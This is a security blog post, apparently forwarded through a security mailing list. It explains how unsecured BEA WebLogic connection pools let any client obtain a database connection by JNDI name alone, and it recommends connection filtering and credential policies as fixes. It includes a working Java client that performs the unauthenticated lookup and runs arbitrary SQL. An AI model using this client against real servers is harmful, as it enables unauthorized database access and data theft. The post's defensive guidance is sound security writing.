Many of today's applications - enterprise and otherwise - are backed by some type of database. Whether this database is used to persist customer information, product information, or really anything in general, it is essential that this resource be protected. Now many of you may be saying My database account uses a 25 character random password that I can't even remember and that is fine, but does your application server know the password? The reason I ask is that many of today's applications, especially enterprise apps, can't run on a web server anymore. They have an enormous number of moving parts and configuration options, and the components used to construct them require the presence of some type of runtime that is generally provided by an application server. Some of the most common application servers in use today include WebLogic <http://www.bea.com/framework.jsp?CNT=index.htm&FP=/content/products/weblogi c/> , Tomcat <http://tomcat.apache.org/> , Sun Glassfish Application <http://www.sun.com/software/products/appsrvr/> Server, JBoss <http://www.jboss.org/> , as well as a few others. As a note, all examples provided here will be centered around BEA WebLogic version 9.2.
To get back to my original point, most of today's applications are backed by
some DBMS. In order to improve performance and efficiency, many of these
applications utilize connection pooling provided by the application server
to cache connections to the backend database thereby centralizing their
database connection management in one place. As an added benefit, the
application does not even need to know the credentials to access the
database in most cases. In the case of WebLogic, the credentials are set
during the creation of the connection pool are are stored internally in the
server. When persisted to a file, the credentials are encrypted to prevent
accidental disclosure to anyone who has access to the filesystem. The key is
not known to the user. Now, the problem with this setup - from a security
perspective of course - is that many developers/administrators do not secure
these connection pools. So what does that mean? It means that as long as
anyone knows the name of the server(which they will have from the URL of the
site) and the JNDI name of the connection pool(WebLogic binds the pool to a
JNDI name) any client can simply ask the server for a connection to the
database. Who cares if your password is super long and "random", all I have
do do is ask for a connection. If you miss my point it is simple - I don't
need to know your database password(generally considered keys to the
kingdom) if I can simply ask for a connection and get one! If you are
wondering what a simple client that asks for a connection would look like,
here you go:
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.InitialContext;
public class DataTest {
public static void main(String[] args) {
InitialContext ctx = null;
Connection conn = null;
Statement stmt = null;
ResultSet rs = null;
Hashtable ht = null;
String wlServer = "yourservername.com:andPort";
String jndiName = "YourDataSource";
try {
ht = new Hashtable();
ht.put(Context.INITIAL_CONTEXT_FACTORY,
"weblogic.jndi.WLInitialContextFactory");
ht.put(Context.PROVIDER_URL, "t3://" + wlServer);
ctx = new InitialContext(ht);
conn = ((javax.sql.DataSource) ctx.lookup(jndiName)).getConnection();
String sql = "anything you want here";
stmt = conn.createStatement();
rs = stmt.executeQuery(sql);
while (rs.next()) {
// get results here
}
}
catch (Exception e) {
e.printStackTrace();
}
finally {
try {
if (stmt != null){ stmt.close(); }
if (conn != null) { conn.close(); }
if (ctx != null) { ctx.close(); }
}
catch (Exception e) {
e.printStackTrace();
}
}
}
}
It really is that simple. Now the caveat to the above code, as I stated
above, is that it is WebLogic specific. Therefore, for everything to work
right you will need the weblogic.jar file. It is simple enough to get if you
are interested, as it comes with every free download of WebLogic from BEA's
website.
Now, to fix this problem. In our case, WebLogic provides a mechanism to
filter incoming requests at the network layer. This mechanism is called
Connection
<http://edocs.bea.com/wls/docs92/secmanage/domain.html#wp1174122##jc1174122>
Filtering. From the docs: "Connection filters allow you to deny access at
the network level. They can be used to protect server resources on
individual servers, server clusters, or an entire internal network or
intranet. For example, you can deny any non-SSL connections originating
outside of your corporate network. Network connection filters are a type of
firewall in that they can be configured to filter on protocols, IP
addresses, and DNS node names." To set these up, simply follow the
instructions provided here
<http://edocs.bea.com/wls/docs92/ConsoleHelp/taskhelp/security/ConfigureConn
ectionFiltering.html> and you will be set.
A good rule of thumb is to only allow applications deployed on the machine,
or in the cluster, to access the configured connection pool. In addition,
you can set up security policies, groups, and users in the WebLogic server
so that a client has to provide a credential set to access the resource even
if they are allowed to access it by the connection filter. This is a good
practice, because localhost is localhost. Anything above that is unknown to
the filter. Credentials, used in conjunction with connection filtering,
allow you to say only apps on this box that provide me this credential set
are allowed to access this resource. This is pretty useful if you are forced
to house multiple applications on the same server and each have a separate
pool.
Try it out. It can't hurt.
Posted by Matt Presson
[Ph4nt0m] <http://www.ph4nt0m.org/>
[Ph4nt0m Security Team]
<http://blog.ph4nt0m.org/> [EMAIL PROTECTED]
Email: [EMAIL PROTECTED]
PingMe:
<http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wu
hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
=== V3ry G00d, V3ry Str0ng ===
=== Ultim4te H4cking ===
=== XPLOITZ ! ===
=== #_# ===
#If you brave,there is nothing you cannot achieve.#
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>
